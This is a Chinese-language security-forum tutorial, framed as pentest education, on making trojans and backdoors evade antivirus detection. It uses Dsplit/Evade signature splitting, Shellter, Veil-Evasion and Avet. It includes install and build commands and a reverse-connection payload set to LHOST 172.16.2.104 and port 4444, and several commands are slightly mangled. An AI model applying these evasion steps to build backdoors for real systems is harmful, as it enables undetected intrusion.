在寫這篇文章之前,讓我們來了解一下反病毒軟件的掃描原理。
反病毒軟件主要基於簽名技術識別病毒,反病毒軟件的掃描程序會掃描特定的字符串,然後與病毒庫進行比對,如果比對成功,那麼反病毒軟件就會報警。
作為一名滲透測試人員或愛好者,木馬後門的運用是必不可少的,但是在殺毒軟件日趨強大的情況下,普通的木馬根本就無法生存。這就催生出了免殺技術。而在免殺與殺毒軟件的鬥爭中,免殺的方法技術也在一步一步改進。常見的免殺手段有特徵碼修改、內存免殺和對文件的免殺。在這裡我就為大家介紹幾款免殺效果比較好的免殺工具。
Dsplit和Evade(Github上有,這裡不貼地址)
這兩款工具都是把可執行文件進行分隔,最終生成很多內容不同的文件。假如您有一個50KB的文件,對文件的前5KB大小的信息進行取樣,則可生成10個取樣文件。第一個文件只會有文件的前5KB信息,第二個文件則由第一個文件的5KB信息和此後的5KB信息組成。以此類推,所有的文件都包含原文件的前5KB信息。
思路:通過切割工具將我們的目標文件切割成若干後,將尺寸最小的文件丟到https://www.virustoal.com上去檢測,去觀察這個取樣文件是否含有可觸發反病毒軟件的特徵簽名?如果沒有,就挨個測下去,直到觸發,就可以判斷在上一個文件的結束地址和這次掃描的文件結束地址之間有匹配了反病毒軟件某個簽名的特徵字符串。接著去修改特定字符串去避開(在不影響程序正常功能的前提下)。這裡只是講述反病毒軟件的缺陷,並演示規避他們檢測手段的一種方法。
Shellter
Shellter 是一個開源的免殺工具,利用動態Shellcode注入來實現免殺的效果。
我們在kali中輸入以下命令去安裝Shellter:
apt-getinstall shellter //安裝Shellter
whereis shellter
wineshellter.exe //運行Shellter
進入我們炫酷的Shellter界面
下載附件 保存到相冊
這裡我們選擇A(A代表自動模式,PE Target是進行免殺的exe預注入文件路徑,程序會被備份到shellter_backup文件夾下,防止原文件被破壞)
後續步驟
L選擇攻擊載荷
生成成功。
Veil-Evasion
Kali中輸入以下命令
切換到Veil-Evasion/setup/目錄下運行setup.shcd Veil-Evasion/setup/ ./setup.sh安裝有點慢,這裡略過。。。
輸入list查看該工具所有模塊
這裡用34模塊進行測試
Set LHOST 172.16.2.104
//設置監聽機Set LPOST 4444
//設置監聽端口Run
//生成免殺後門
注意,需要自己為免殺後門取名或者默認即可,還要為免殺後門選擇一種編譯方式,這裡我們選擇免殺效果更好的第2種方式進行編譯。
當出現下圖時證明木馬已經生成,會提示木馬所在位置:
實測查殺效果
Avet(BlackHat新工具)
Kali中輸入以下命令進行安裝
git clone https://github.com/govolution/avet
安裝後如果出現報錯的問題,編譯一下兩個.c文件:
cd avet-master
gcc -o make_avet make_avet.c
gcc -o sh_format sh_format.c
安裝完成後,找到自己要使用的攻擊載荷,切換到/avet/build目錄找到相應的.sh文件,對相應的Lhost和Lport進行相應的修改。
用wine安裝tdm-gcc(我是在物理機下載後複製過來安裝)
wine tdm64-gcc-5.1.0-2.exe
然後再用切換到/avet目錄執行./build/相應的載荷,如下圖。
生成的.exe文件就在avet文件夾內,默認名稱為pwn.exe。
備註:各大免殺工具生成的惡意軟件安全期約為一週左右,之後很大可能性被查殺。
最新的無特徵免殺法:
何為無特徵免殺法?就是脫離傳統的定位方法,直接盲免,就對於整體區段進行異或加密,是整體代碼發生變換,從而逃脫殺毒軟件的查殺,是當今最流行的方法。限於篇幅暫且不提,感興趣的讀者可以自行去了解一下~
注意,文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用
當然了,如果你也想成為一名白帽子,或者對網絡安全技術感興趣,可以關注我,或者加白帽子群(451217067)共同成長~
閱讀更多 i春秋論壇 的文章
